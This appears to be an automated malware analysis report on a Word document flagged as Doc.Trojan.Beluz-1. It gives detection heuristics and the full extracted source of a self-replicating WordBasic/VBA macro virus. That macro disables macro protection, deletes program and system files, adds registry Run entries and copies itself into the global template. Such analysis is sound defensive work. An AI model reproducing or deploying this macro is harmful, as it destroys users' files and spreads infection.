MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic macro with AutoOpen and Auto_Close routines, indicative of older malware. The macro attempts to delete files from common program directories and displays a deceptive message. The ClamAV detection 'Doc.Trojan.Beluz-1' further confirms its malicious nature. The presence of VBA macros and the AutoOpen function strongly suggest this is a malicious document delivered as a spearphishing attachment.
Heuristics 6
-
ClamAV: Doc.Trojan.Beluz-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Beluz-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5728 bytes |
SHA-256: 257754ed9f0c96675a9e1ea53fb5fd6d0585f0670574a7e30bcfd2bb923ce7fc |
|||
|
Detection
ClamAV:
Doc.Trojan.Beluz-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Deneca"
'Virus macro name: Deneca
'************************
'Brasil 2005
'************************
Sub AutoOpen()
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
End With
MsgBox " Computador foi modificado agora!", vbOKOnly + vbCritical, "Virus declara!!"
WordBasic.Kill "C:\Program Files\Microsoft FrontPage\*.*"
WordBasic.Kill "C:\Program Files\GetRight\*.*"
WordBasic.Kill "C:\Program Files\Winzip\*.*"
WordBasic.Kill "C:\Program Files\Winamp\*.*"
WordBasic.Kill "C:\Arquivos de programas\Microsoft FrontPage\*.*"
WordBasic.Kill "C:\Arquivos de programas\GetRight\*.*"
WordBasic.Kill "C:\Arquivos de programas\Winzip\*.*"
WordBasic.Kill "C:\Arquivos de programas\Winamp\*.*"
WordBasic.Kill "C:\Windows\Application Data\*.*"
WordBasic.Kill "C:\Windows\System\*.*"
WordBasic.Kill "C:\Windows\Command\*.*"
With ActiveDocument.Shapes.AddShape _
(msoShapeIsoscelesTriangle, 80, 80, 90, 50).Fill
.ForeColor.RGB = RGB(255, 255, 0)
.BackColor.RGB = RGB(255, 0, 0)
.Patterned msoPatternDarkVertical
End With
ActiveDocument.Shapes.AddTextEffect _
PresetTextEffect:=msoTextEffect13, _
Text:="Seu desktop foi modificado!!", _
FontName:="Times New Roman ", _
FontSize:=24, _
FontBold:=True, _
FontItalic:=False, _
Left:=InchesToPoints(1), _
Top:=InchesToPoints(1), _
Anchor:=ActiveDocument.Paragraphs(1).Range
With Assistant.NewBalloon
.Icon = msoIconAlertCritical
.Heading = "Virus diz!!"
.Text = "Fui ativado."
.Animation = msoAnimationWorkingAtSomething
.Show
ActiveDocument.SaveAs FileName:="C:\Beluz.doc"
ActiveDocument.Saved = True
End With
End Sub
Sub AutoClose()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Deneca") = "Virus salvado"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Especial") = "C:\ARQUIV~1\Deneca.bat"
Open "C:\ARQUIV~1\Deneca.bat" For Output As #1
Print #1, "@echo off"
Print #1, "Echo Seu computador apresenta problemas."
Print #1, "Echo Estou dentro de seu computador."
Print #1, "Echo Word macro virus."
Print #1, "Echo Infectado com macro virus."
Print #1, "Echo Macro virus word ativado."
Print #1, "Echo Problema encontrado."
Print #1, "Echo Computador alterado."
Print #1, "Echo Ano 2005."
Close #1
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Scrollbar", "255 0 0", "" 'Red
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Background", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Menu", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Window", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "WindowFrame", "0 255 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "MenuText", "0 255 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "HilightText", "0 0 0", "" 'Black
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonFace", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonShadow", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonText", "0 255 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InactiveTitleText", "0 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonDkShadow", "0 255 0", "" 'Green
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonLight", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InfoText", "255 0 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InfoWindow", "0 255 0", ""
WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonAlternateFace", "255 0 0", ""
'Changes windows desktop colors to Red
Set myRange = ActiveDocument.Content
myRange.Find.Execute FindText:="a", _
ReplaceWith:="HOHOHOHO", Replace:=wdReplaceAll
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "Deneca" Then
binstalled = -1
End If
If WordBasic.[MacroName$](i, 0, 0) = "Deneca" Then
bTooMuchTrouble = -1
End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
sMe$ = WordBasic.[FileName$]()
sMacro$ = sMe$ + ":Deneca"
WordBasic.MacroCopy sMacro$, "Global:Deneca"
sMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:Deneca"
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
Application.DisplayStatusBar = False 'Disable Tools macro
End Sub
'Virus macro name: Deneca
'************************
'Ano 2005
'************************
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.